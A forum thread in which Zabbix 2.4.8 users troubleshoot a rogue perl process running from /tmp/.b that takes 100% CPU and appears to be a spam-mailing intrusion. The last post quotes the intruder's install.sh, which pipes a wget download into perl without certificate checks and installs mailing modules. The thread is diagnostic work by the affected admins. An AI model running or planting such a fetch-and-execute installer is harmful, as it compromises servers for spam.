Ad Widget

Collapse

Zabbix process taking 100% CPU

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • theWoosh
    Junior Member
    • Nov 2015
    • 20

    #1

    Zabbix process taking 100% CPU

    Hi
    I am running a ubuntu 14.04 server with Zabbix Server and agent 2.4.8
    I am noticing an unamed process owned by zabbix user that is taking 100% cpu. If I stop zabbix-agen and zabbix-server it continues to run and when I kill it it doesn't restart immediately or with a zabbix restart, but I find it running again the next day.

    Can anyone suggest what I can do to understand and fix this?

    many Thanks
    Last edited by theWoosh; 13-01-2017, 14:06.
  • theWoosh
    Junior Member
    • Nov 2015
    • 20

    #2
    the process has restarted again (after being killed), but not immediately...
    htop shows:
    PID USER PRI NI VIRT RES SHR S CPU% MEM% TIME+ Commnad
    26327 zabbix 20 0 2478 4108 804 R 99.7% 0.1% 17h24:55
    ...no command displayed ...

    ppid is shown as 1 (from ps)

    no output from:
    #cat /proc/26327/cmdline

    how can I find out what this is about? any ideas?

    Comment

    • theWoosh
      Junior Member
      • Nov 2015
      • 20

      #3
      Where is the zabbix system user password configured?

      SInce this process is owned by the zabbix system user and I can't figure out how it is getting spawned and what it is doing, I have changed the zabbix system user password and stopped zabbix to see if this helps prevent the problem until I have some way of establishing the cause...
      Last edited by theWoosh; 13-01-2017, 13:55.

      Comment

      • theWoosh
        Junior Member
        • Nov 2015
        • 20

        #4
        please not corrected error in zabbix version on this post...

        Hi I made a mistake in the original post - I have corrected this post to reflect the actual zabbix version running on this server - which is 2.4.8.

        Comment

        • Pada
          Senior Member
          • Apr 2012
          • 236

          #5
          Here are some other commands that may be useful in debugging it:
          # ls -la /proc/26327/exe
          # cat /proc/26327/status
          # lsof -n -p 26327

          Also, how often are you running the housekeeper?

          Comment

          • theWoosh
            Junior Member
            • Nov 2015
            • 20

            #6
            Thanks for the suggestions - I will try them when/if the process restarts...
            THough please note that when I tried:
            #cat /proc/26327/cmdline
            ...there was no data returned

            The Housekeeping settings are as installed:
            Events and alerts
            Enable internal housekeeping yes

            Trigger data storage period (in days) 365
            Internal data storage period (in days) 365
            Network discovery data storage period (in days) 365
            Auto-registration data storage period (in days) 365

            IT services
            Enable internal housekeeping yes

            Data storage period (in days) 365

            Audit
            Enable internal housekeeping yes

            Data storage period (in days) 365
            User sessions
            Enable internal housekeeping yes

            Data storage period (in days) 365

            History
            Enable internal housekeeping yes

            Override item history period no

            Data storage period (in days) 90

            Trends
            Enable internal housekeeping

            Override item trend period no

            Data storage period (in days) 365

            Comment

            • Pada
              Senior Member
              • Apr 2012
              • 236

              #7
              What is your "HousekeepingFrequency" in your zabbix_server.conf file?

              THough please note that when I tried:
              #cat /proc/26327/cmdline
              ...there was no data returned
              Did it return empty result or an error? If it returned result, the other things I mentioned may be of use. Unfortunately you'll need to wait till this strange process starts again...

              Comment

              • theWoosh
                Junior Member
                • Nov 2015
                • 20

                #8
                Thanks for helping...

                The housekeeping frequency is commented out in the zabbix_server.conf file...

                ...and I received no data back at all from cat /proc/26327/cmdline

                Comment

                • theWoosh
                  Junior Member
                  • Nov 2015
                  • 20

                  #9
                  Zabbix has not been running for a couple of days and the rogue process has not returned.
                  I will leave it for a bit and then switch zabbix back on and see if it recurs.
                  I will miss having zabbix running but I can't run it if it is causing this somehow so any help would be useful...

                  Comment

                  • Pada
                    Senior Member
                    • Apr 2012
                    • 236

                    #10
                    So far the only thing that I've had with our Zabbix that was hogging the CPU was stuck fping processes, which I now simply kill if they run for longer than a minute with the following cron.d script:
                    Code:
                    * * * * * root /usr/bin/killall --older-than 1m fping 2> /dev/null

                    Comment

                    • alex91
                      Junior Member
                      • Mar 2017
                      • 3

                      #11
                      Hi!
                      It looks like I'm facing a similar issue with Zabbix of the same version (2.4.8).

                      # ls -la /proc/4187/exe
                      lrwxrwxrwx 1 zabbix zabbix 0 Mar 6 00:39 /proc/4187/exe -> /usr/bin/perl
                      # lsof -n -p 4187
                      COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
                      (unknown) 4187 zabbix cwd DIR 0,22 220 525 /tmp/.b
                      (unknown) 4187 zabbix rtd DIR 253,1 4096 2 /
                      (unknown) 4187 zabbix txt REG 253,1 10416 1272 /usr/bin/perl
                      (unknown) 4187 zabbix mem REG 253,1 43416 1419 /usr/lib/perl/5.18.2/auto/Socket/Socket.so
                      (unknown) 4187 zabbix mem REG 253,1 18728 1425 /usr/lib/perl/5.18.2/auto/IO/IO.so
                      (unknown) 4187 zabbix mem REG 253,1 43368 8669 /lib/x86_64-linux-gnu/libcrypt-2.19.so
                      (unknown) 4187 zabbix mem REG 253,1 141574 8674 /lib/x86_64-linux-gnu/libpthread-2.19.so
                      (unknown) 4187 zabbix mem REG 253,1 1071552 8665 /lib/x86_64-linux-gnu/libm-2.19.so
                      (unknown) 4187 zabbix mem REG 253,1 14664 8668 /lib/x86_64-linux-gnu/libdl-2.19.so
                      (unknown) 4187 zabbix mem REG 253,1 1840928 8684 /lib/x86_64-linux-gnu/libc-2.19.so
                      (unknown) 4187 zabbix mem REG 253,1 1608280 1273 /usr/lib/libperl.so.5.18.2
                      (unknown) 4187 zabbix mem REG 253,1 149120 8675 /lib/x86_64-linux-gnu/ld-2.19.so
                      (unknown) 4187 zabbix 0w CHR 1,3 0t0 6 /dev/null
                      (unknown) 4187 zabbix 1w CHR 1,3 0t0 6 /dev/null
                      (unknown) 4187 zabbix 2w CHR 1,3 0t0 6 /dev/null
                      (unknown) 4187 zabbix 3u IPv4 7326407 0t0 TCP 185.117.155.200:46912->138.68.80.133:http (ESTABLISHED)
                      (unknown) 4187 zabbix 6u unix 0xffff88007c9a0000 0t0 11397 socket
                      (unknown) 4187 zabbix 7u sock 0,8 0t0 7324905 can't identify protocol

                      # ls -la /tmp/.b
                      total 32
                      drwxr-xr-x 3 zabbix zabbix 220 Mar 9 17:39 .
                      drwxrwxrwt 7 root root 140 Mar 9 17:53 ..
                      -rw-r--r-- 1 zabbix zabbix 13 Mar 8 10:52 body.html
                      -rw-r--r-- 1 zabbix zabbix 397 Nov 16 2015 install.sh
                      -rw-r--r-- 1 zabbix zabbix 29 Jan 8 21:56 list.txt
                      -rw-rw-r-- 1 zabbix zabbix 13 Mar 8 10:52 nick.txt
                      drwxr-xr-x 5 zabbix zabbix 100 Jun 5 2016 perl5
                      -rw-r--r-- 1 zabbix zabbix 172 Nov 16 2015 .profile
                      -rw-r--r-- 1 zabbix zabbix 1524 Nov 16 2015 send2.pl
                      -rw-r--r-- 1 zabbix zabbix 112 Nov 16 2015 send.sh
                      -rw-rw-r-- 1 zabbix zabbix 74 Mar 8 10:52 ss

                      It looks like it is running a perl script of some sort that takes email addresses from list.txt and sends them emails with the contents of body.html
                      The body.html (as well as nick.txt) contains only "Linux|460513" string.
                      How is this connected to zabbix? Is this a spam bot?

                      Comment

                      • theWoosh
                        Junior Member
                        • Nov 2015
                        • 20

                        #12
                        Hi Alex91
                        Zabbix is running again and again taking 100% of CPU. It looks like the exact same problem to you. I get the following (which looks extremely similar):

                        # ls -la /proc/12928/exe
                        lrwxrwxrwx 1 zabbix zabbix 0 Mar 13 06:39 /proc/12928/exe -> /usr/bin/perl

                        # cat /proc/12928/status
                        Name:
                        State: R (running)
                        Tgid: 12928
                        Ngid: 0
                        Pid: 12928
                        PPid: 1
                        TracerPid: 0
                        Uid: 115 115 115 115
                        Gid: 125 125 125 125
                        FDSize: 64
                        Groups: 125
                        VmPeak: 24788 kB
                        VmSize: 24788 kB
                        VmLck: 0 kB
                        VmPin: 0 kB
                        VmHWM: 4200 kB
                        VmRSS: 4116 kB
                        VmData: 3464 kB
                        VmStk: 136 kB
                        VmExe: 8 kB
                        VmLib: 4684 kB
                        VmPTE: 64 kB
                        VmSwap: 0 kB
                        Threads: 1
                        SigQ: 0/47573
                        SigPnd: 0000000000000000
                        ShdPnd: 0000000000000000
                        SigBlk: 0000000000000000
                        SigIgn: 0000000000015083
                        SigCgt: 0000000180000000
                        CapInh: 0000000000000000
                        CapPrm: 0000000000000000
                        CapEff: 0000000000000000
                        CapBnd: 0000001fffffffff
                        Seccomp: 0
                        Cpus_allowed: ff
                        Cpus_allowed_list: 0-7
                        Mems_allowed: 00000000,00000001
                        Mems_allowed_list: 0
                        voluntary_ctxt_switches: 16
                        nonvoluntary_ctxt_switches: 5360898


                        # lsof -n -p 12928
                        COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
                        (unknown) 12928 zabbix cwd DIR 8,1 4096 147462 /tmp/.b
                        (unknown) 12928 zabbix rtd DIR 8,1 4096 2 /
                        (unknown) 12928 zabbix txt REG 8,1 10416 786544 /usr/bin/perl
                        (unknown) 12928 zabbix mem REG 8,1 43416 786644 /usr/lib/perl/5.18.2/auto/Socket/Socket.so
                        (unknown) 12928 zabbix mem REG 8,1 18728 786663 /usr/lib/perl/5.18.2/auto/IO/IO.so
                        (unknown) 12928 zabbix mem REG 8,1 43368 920228 /lib/x86_64-linux-gnu/libcrypt-2.19.so
                        (unknown) 12928 zabbix mem REG 8,1 141574 920238 /lib/x86_64-linux-gnu/libpthread-2.19.so
                        (unknown) 12928 zabbix mem REG 8,1 1071552 920219 /lib/x86_64-linux-gnu/libm-2.19.so
                        (unknown) 12928 zabbix mem REG 8,1 14664 920224 /lib/x86_64-linux-gnu/libdl-2.19.so
                        (unknown) 12928 zabbix mem REG 8,1 1840928 920250 /lib/x86_64-linux-gnu/libc-2.19.so
                        (unknown) 12928 zabbix mem REG 8,1 1608280 786563 /usr/lib/libperl.so.5.18.2
                        (unknown) 12928 zabbix mem REG 8,1 149120 920239 /lib/x86_64-linux-gnu/ld-2.19.so
                        (unknown) 12928 zabbix 0w CHR 1,3 0t0 1029 /dev/null
                        (unknown) 12928 zabbix 1w CHR 1,3 0t0 1029 /dev/null
                        (unknown) 12928 zabbix 2w CHR 1,3 0t0 1029 /dev/null
                        (unknown) 12928 zabbix 3u IPv4 8550373 0t0 TCP 5.57.57.18:35222->212.24.105.253:http (ESTABLISHED)
                        (unknown) 12928 zabbix 6u unix 0xffff880002573fc0 0t0 2119769 socket
                        (unknown) 12928 zabbix 7u sock 0,7 0t0 8553877 can't identify protocol


                        # ls -la /tmp/.b
                        total 100
                        drwxr-xr-x 3 zabbix zabbix 4096 Mar 13 07:47 .
                        drwxrwxrwt 6 root root 53248 Mar 13 09:40 ..
                        -rw-r--r-- 1 zabbix zabbix 13 Mar 13 07:13 body.html
                        -rw-r--r-- 1 zabbix zabbix 397 Nov 16 2015 install.sh
                        -rw-rw-r-- 1 zabbix zabbix 28 Mar 13 07:13 list.txt
                        -rw-rw-r-- 1 zabbix zabbix 13 Mar 13 07:10 nick.txt
                        drwxr-xr-x 5 zabbix zabbix 4096 Jun 5 2016 perl5
                        -rw-r--r-- 1 zabbix zabbix 172 Nov 16 2015 .profile
                        -rw-rw-r-- 1 zabbix zabbix 74 Mar 13 07:47 qq
                        -rw-r--r-- 1 zabbix zabbix 1556 Nov 16 2015 send2.pl
                        -rw-r--r-- 1 zabbix zabbix 112 Nov 16 2015 send.sh
                        -rw-rw-r-- 1 zabbix zabbix 74 Mar 13 07:14 sq

                        - like you nick.txt just contains a string like Linux|nnnnnn but list.txt contains: [email protected]

                        I am switching Zabbix off again for the time being as I don't understand this at all...

                        Comment

                        • alex91
                          Junior Member
                          • Mar 2017
                          • 3

                          #13
                          list.txt on my machine had just one Italian email in it too, but it was a different one from yours.
                          It also looks like this script needs some time to create /tmp/.b folder. This morning I caught it running since 2:30 am (so it was running for 8 hours or so), but no temporary folder was created (though, all the other symptoms are the same).
                          For now I killed the process and thinking about writing a cron task that will run every 30 mins, check whether that thing is active, and kill it.

                          It would be nice if somebody with more advanced knowledge of unix can help us figure out what's going on.

                          Comment

                          • theWoosh
                            Junior Member
                            • Nov 2015
                            • 20

                            #14
                            weird... why would it send a one line message to a strange italian email address...? and why would that kill the cpu? Is this just a broken bit of code or is it maleficent? have you checked your mail queue?

                            Comment

                            • theWoosh
                              Junior Member
                              • Nov 2015
                              • 20

                              #15
                              ...and it doesn't look good that it has installed a perl5 directory in /tmp. On mine this contains cpanm & instmodsh.
                              The install.sh that also resides in /tmp.b contains the following (and explains how the perl files got there):

                              #!/bin/bash
                              this=$(pwd)
                              declare -x HOME="$this"

                              wget -O- --no-check-certificate http://cpanmin.us | perl - -l ~/perl5 App::cpanminus local::lib
                              eval `perl -I ~/perl5/lib/perl5 -Mlocal::lib`
                              echo 'eval `perl -I ~/perl5/lib/perl5 -Mlocal::lib`' >> ~/.profile
                              echo 'export MANPATH=$HOME/perl5/man:$MANPATH' >> ~/.profile
                              cpanm install Parallel::ForkManager Mail::Sendmail

                              Comment

                              Working...